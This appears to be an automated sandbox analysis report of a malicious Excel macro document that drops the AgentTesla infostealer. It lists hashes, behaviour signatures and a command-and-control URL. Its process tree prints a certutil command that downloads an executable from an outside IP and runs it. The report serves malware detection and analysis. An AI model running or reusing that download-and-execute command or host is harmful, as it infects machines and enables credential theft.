Analysis
-
max time kernel
109s -
max time network
100s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
03-10-2022 09:36
Static task
static1
Behavioral task
behavioral1
Sample
DocRFQ2050023RFT.xlsm
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
DocRFQ2050023RFT.xlsm
Resource
win10v2004-20220812-en
General
-
Target
DocRFQ2050023RFT.xlsm
-
Size
102KB
-
MD5
10752bde286212b1e5ec01803a554c03
-
SHA1
862d54b78dd19d45a980f49201e6acca47857252
-
SHA256
4689852a6e06ba83be08fe943de1159aa8aaad7e1701b5fae5786ddd0930ba23
-
SHA512
7f831287482a9be78033ae840bee703a547ba9e35b922548fbbbbdd4a414748b4fead71f3456b726f1b391d686743febf70cc7163729f0a72f9b375cf620cb4e
-
SSDEEP
3072:yZOKZu86S3Roy9uFwZlsaFPOHYonHBxqPZ5uf:ycYuS/IwZltFPgYonHBxqPZS
Malware Config
Extracted
agenttesla
http://45.155.165.63/3ip/inc/523ecb38582a9c.php
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1080 2020 cmd.exe EXCEL.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exeBstsrrsxagmkhenpstz.exe.exepid process 1580 Bstsrrsxagmkhenpstz.exe.exe 1376 Bstsrrsxagmkhenpstz.exe.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1080 cmd.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Bstsrrsxagmkhenpstz.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Bstsrrsxagmkhenpstz.exe.exe Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Bstsrrsxagmkhenpstz.exe.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\offi = "\"C:\\Users\\Admin\\AppData\\Roaming\\doc\\offi.exe\"" Bstsrrsxagmkhenpstz.exe.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exedescription pid process target process PID 1580 set thread context of 1376 1580 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe -
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE -
Modifies registry class 64 IoCs
Processes:
EXCEL.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2020 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exepid process 1376 Bstsrrsxagmkhenpstz.exe.exe 1376 Bstsrrsxagmkhenpstz.exe.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exeBstsrrsxagmkhenpstz.exe.exedescription pid process Token: SeDebugPrivilege 1580 Bstsrrsxagmkhenpstz.exe.exe Token: SeDebugPrivilege 1376 Bstsrrsxagmkhenpstz.exe.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
EXCEL.EXEBstsrrsxagmkhenpstz.exe.exepid process 2020 EXCEL.EXE 2020 EXCEL.EXE 2020 EXCEL.EXE 1376 Bstsrrsxagmkhenpstz.exe.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
EXCEL.EXEcmd.exeBstsrrsxagmkhenpstz.exe.exedescription pid process target process PID 2020 wrote to memory of 1080 2020 EXCEL.EXE cmd.exe PID 2020 wrote to memory of 1080 2020 EXCEL.EXE cmd.exe PID 2020 wrote to memory of 1080 2020 EXCEL.EXE cmd.exe PID 2020 wrote to memory of 1080 2020 EXCEL.EXE cmd.exe PID 1080 wrote to memory of 2040 1080 cmd.exe certutil.exe PID 1080 wrote to memory of 2040 1080 cmd.exe certutil.exe PID 1080 wrote to memory of 2040 1080 cmd.exe certutil.exe PID 1080 wrote to memory of 2040 1080 cmd.exe certutil.exe PID 1080 wrote to memory of 1580 1080 cmd.exe Bstsrrsxagmkhenpstz.exe.exe PID 1080 wrote to memory of 1580 1080 cmd.exe Bstsrrsxagmkhenpstz.exe.exe PID 1080 wrote to memory of 1580 1080 cmd.exe Bstsrrsxagmkhenpstz.exe.exe PID 1080 wrote to memory of 1580 1080 cmd.exe Bstsrrsxagmkhenpstz.exe.exe PID 1580 wrote to memory of 1376 1580 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1580 wrote to memory of 1376 1580 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1580 wrote to memory of 1376 1580 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1580 wrote to memory of 1376 1580 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1580 wrote to memory of 1376 1580 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1580 wrote to memory of 1376 1580 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1580 wrote to memory of 1376 1580 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1580 wrote to memory of 1376 1580 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe PID 1580 wrote to memory of 1376 1580 Bstsrrsxagmkhenpstz.exe.exe Bstsrrsxagmkhenpstz.exe.exe -
outlook_office_path 1 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Bstsrrsxagmkhenpstz.exe.exe -
outlook_win_path 1 IoCs
Processes:
Bstsrrsxagmkhenpstz.exe.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Bstsrrsxagmkhenpstz.exe.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\DocRFQ2050023RFT.xlsm1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c certutil.exe -urlcache -split -f "http://45.155.165.63/br1/loader/uploads/Doc_2050023_RFT.exe" Bstsrrsxagmkhenpstz.exe.exe && Bstsrrsxagmkhenpstz.exe.exe2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\certutil.execertutil.exe -urlcache -split -f "http://45.155.165.63/br1/loader/uploads/Doc_2050023_RFT.exe" Bstsrrsxagmkhenpstz.exe.exe3⤵
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeBstsrrsxagmkhenpstz.exe.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeC:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exe4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeFilesize
1.4MB
MD510dcb9e5aabe78f2bf22481b70658d15
SHA119dad72451cb471f9762a6a7c72e57f2f17197bf
SHA256fc23a4a16e5f2ad4467d969f7a53b5a67d9d3d33ef3d427c7aa883916f8c251c
SHA5121afc876a8b5626a38af604a30127b0a1af9d0aa358b7fdb0e544e0f408a6599a7df5283fe09896eee04bd859b1dc0aff83481911a2e4a37bc02f1465f8f3f6dc
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeFilesize
1.4MB
MD510dcb9e5aabe78f2bf22481b70658d15
SHA119dad72451cb471f9762a6a7c72e57f2f17197bf
SHA256fc23a4a16e5f2ad4467d969f7a53b5a67d9d3d33ef3d427c7aa883916f8c251c
SHA5121afc876a8b5626a38af604a30127b0a1af9d0aa358b7fdb0e544e0f408a6599a7df5283fe09896eee04bd859b1dc0aff83481911a2e4a37bc02f1465f8f3f6dc
-
C:\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeFilesize
1.4MB
MD510dcb9e5aabe78f2bf22481b70658d15
SHA119dad72451cb471f9762a6a7c72e57f2f17197bf
SHA256fc23a4a16e5f2ad4467d969f7a53b5a67d9d3d33ef3d427c7aa883916f8c251c
SHA5121afc876a8b5626a38af604a30127b0a1af9d0aa358b7fdb0e544e0f408a6599a7df5283fe09896eee04bd859b1dc0aff83481911a2e4a37bc02f1465f8f3f6dc
-
\Users\Admin\Documents\Bstsrrsxagmkhenpstz.exe.exeFilesize
1.4MB
MD510dcb9e5aabe78f2bf22481b70658d15
SHA119dad72451cb471f9762a6a7c72e57f2f17197bf
SHA256fc23a4a16e5f2ad4467d969f7a53b5a67d9d3d33ef3d427c7aa883916f8c251c
SHA5121afc876a8b5626a38af604a30127b0a1af9d0aa358b7fdb0e544e0f408a6599a7df5283fe09896eee04bd859b1dc0aff83481911a2e4a37bc02f1465f8f3f6dc
-
memory/1080-61-0x0000000000000000-mapping.dmp
-
memory/1376-75-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1376-78-0x00000000004359EE-mapping.dmp
-
memory/1376-72-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1376-77-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1376-81-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1376-76-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1376-83-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1376-73-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/1580-69-0x0000000000BF0000-0x0000000000D64000-memory.dmpFilesize
1.5MB
-
memory/1580-71-0x00000000046C0000-0x0000000004752000-memory.dmpFilesize
584KB
-
memory/1580-70-0x0000000004610000-0x00000000046C4000-memory.dmpFilesize
720KB
-
memory/1580-67-0x0000000000000000-mapping.dmp
-
memory/2020-54-0x000000002FDA1000-0x000000002FDA4000-memory.dmpFilesize
12KB
-
memory/2020-64-0x00000000728FD000-0x0000000072908000-memory.dmpFilesize
44KB
-
memory/2020-58-0x00000000756B1000-0x00000000756B3000-memory.dmpFilesize
8KB
-
memory/2020-57-0x00000000728FD000-0x0000000072908000-memory.dmpFilesize
44KB
-
memory/2020-56-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2020-55-0x0000000071911000-0x0000000071913000-memory.dmpFilesize
8KB
-
memory/2020-85-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2020-86-0x00000000728FD000-0x0000000072908000-memory.dmpFilesize
44KB
-
memory/2040-62-0x0000000000000000-mapping.dmp